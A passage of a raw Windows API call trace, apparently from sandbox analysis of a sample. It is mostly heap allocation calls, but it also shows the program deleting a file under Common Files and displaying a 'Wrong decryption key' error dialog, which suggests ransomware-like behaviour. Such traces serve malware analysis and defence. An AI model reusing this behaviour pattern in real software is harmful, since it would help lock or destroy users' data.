[0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec930 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b210 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af10 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c10 | out: hHeap=0xc60000) returned 1 [0255.634] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec908 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78df8 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec9d0 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4be0 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec9a8 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b048 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b318 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bf0 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec980 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b000 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2d0 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c30 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec890 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78bb8 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b88 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec818 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c40 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec3b8 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0255.635] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78b28 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ba0 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecac0 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ac8 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec8e0 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c20 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec8b8 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b078 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeeca98 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bb0 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeeca70 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b138 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeeca48 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bc0 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeeca20 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b1f8 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78cd8 | out: hHeap=0xc60000) returned 1 [0255.636] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bd0 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec9f8 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7af88 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78c48 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b90 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeecae8 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c90 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c70 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc2c80 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aef8 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b360 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc2d08 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0255.637] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0255.638] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec868 | out: hHeap=0xc60000) returned 1 [0255.638] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c50 | out: hHeap=0xc60000) returned 1 [0255.638] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0255.638] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b120 | out: hHeap=0xc60000) returned 1 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0255.639] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c50 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xefe3d0 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c60 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefe3d0 | out: hHeap=0xc60000) returned 1 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c60 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0255.639] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c50 | out: hHeap=0xc60000) returned 1 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed5938 [0255.639] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b120 [0255.639] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c50 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c60 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c80 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0255.640] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc2d08 [0255.640] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0255.640] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0255.640] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0255.640] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0255.640] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c50 | out: hHeap=0xc60000) returned 1 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c50 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c60 [0255.640] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c70 [0255.641] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", nBufferLength=0x7fff, lpBuffer=0x86f6f0, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFilePart=0x0) returned 0x1f [0255.641] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81c88 [0255.641] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 0x20 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c90 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b360 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aef8 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4cd0 [0255.641] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b300 [0255.642] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4b90 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aef8 | out: hHeap=0xc60000) returned 1 [0255.642] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec868 [0255.642] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4bd0 [0255.642] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81cd0 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b360 | out: hHeap=0xc60000) returned 1 [0255.642] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed2d48 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0255.642] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xefc3e8 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81cd0 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4bd0 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4b90 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec868 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0255.642] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0255.643] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0255.643] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c90 | out: hHeap=0xc60000) returned 1 [0255.643] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370", lpFindFileData=0x87f738 | out: lpFindFileData=0x87f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x39d986f0, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x39e10100, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x87f770, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0xed5878 [0255.643] DeleteFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 1 [0255.644] FindNextFileW (in: hFindFile=0xed5878, lpFindFileData=0x87f738 | out: lpFindFileData=0x87f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x39d986f0, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x39e10100, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x87f770, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0 [0255.645] FindClose (in: hFindFile=0xed5878 | out: hFindFile=0xed5878) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefc3e8 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c70 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81c88 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c50 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcc2d08 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b120 | out: hHeap=0xc60000) returned 1 [0255.646] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0255.647] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0255.647] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0255.647] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0255.647] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0255.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b120 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c80 [0255.648] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c80 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0255.648] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c80 [0255.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b300 [0255.648] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0255.648] MessageBoxW (hWnd=0x0, lpText="Wrong decryption key", lpCaption="Error!", uType=0x10010) returned 1 [0255.663] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.663] NtdllDialogWndProc_W () returned 0x1 [0255.665] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.665] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.665] NtdllDialogWndProc_W () returned 0x0 [0255.734] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.735] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.735] NtdllDialogWndProc_W () returned 0x0 [0255.735] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.735] NtdllDialogWndProc_W () returned 0x1 [0255.735] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.735] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.735] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.735] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] NtdllDialogWndProc_W () returned 0x0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.736] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.736] NtdllDialogWndProc_W () returned 0x0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.736] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0255.736] NtdllDialogWndProc_W () returned 0x0 [0255.763] GetForegroundWindow () returned 0x5014e [0255.763] GetWindowLongW (hWnd=0x5014e, nIndex=-21) returned 8911016 [0255.790] GetForegroundWindow () returned 0x5014e [0255.790] GetWindowLongW (hWnd=0x5014e, nIndex=-21) returned 8911016 [0255.855] GetForegroundWindow () returned 0x5014e [0255.855] GetWindowLongW (hWnd=0x5014e, nIndex=-21) returned 8911016 [0255.890] GetForegroundWindow () returned 0x5014e [0255.890] GetWindowLongW (hWnd=0x5014e, nIndex=-21) returned 8911016 [0255.930] GetForegroundWindow () returned 0x5014e [0255.930] GetWindowLongW (hWnd=0x5014e, nIndex=-21) returned 8911016 [0255.987] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.987] NtdllDialogWndProc_W () returned 0x0 [0255.989] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.989] NtdllDialogWndProc_W () returned 0x1 [0255.989] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.989] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.989] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.989] SetBkColor (hdc=0x23010712, color=0xf0f0f0) returned 0xf0f0f0 [0255.991] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.991] NtdllDialogWndProc_W () returned 0x0 [0255.991] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.991] NtdllDialogWndProc_W () returned 0x0 [0255.993] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.993] NtdllDialogWndProc_W () returned 0x1 [0255.993] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.993] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.993] GetSysColor (nIndex=15) returned 0xf0f0f0 [0255.993] SetBkColor (hdc=0x23010712, color=0xf0f0f0) returned 0xf0f0f0 [0255.993] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.993] NtdllDialogWndProc_W () returned 0x0 [0255.993] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.993] NtdllDialogWndProc_W () returned 0x0 [0255.994] NtdllDefWindowProc_W () returned 0x0 [0255.994] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.994] NtdllDialogWndProc_W () returned 0x1 [0255.995] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.995] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0255.995] NtdllDialogWndProc_W () returned 0x0 [0256.011] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b120 | out: hHeap=0xc60000) returned 1 [0256.011] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0256.011] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0256.011] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0256.012] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b228 | out: hHeap=0xc60000) returned 1 [0256.012] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0256.012] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.012] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.012] TranslateMessage (lpMsg=0x87fa94) returned 0 [0256.012] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0256.012] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.012] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.012] TranslateMessage (lpMsg=0x87fa94) returned 0 [0256.012] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0256.012] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.012] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.012] GetWindowLongW (hWnd=0x50150, nIndex=-20) returned 256 [0256.012] NtdllDialogWndProc_W () returned 0x1 [0256.012] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.012] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.012] GetClientRect (in: hWnd=0x50150, lpRect=0x87f7e0 | out: lpRect=0x87f7e0) returned 1 [0256.012] GetCursorPos (in: lpPoint=0x87f7f0 | out: lpPoint=0x87f7f0*(x=781, y=507)) returned 1 [0256.012] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f7f0 | out: lpPoint=0x87f7f0) returned 1 [0256.012] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0256.013] SetCursor (hCursor=0x10003) returned 0x10003 [0256.013] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.013] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0256.013] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.013] NtdllDialogWndProc_W () returned 0x0 [0256.013] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, 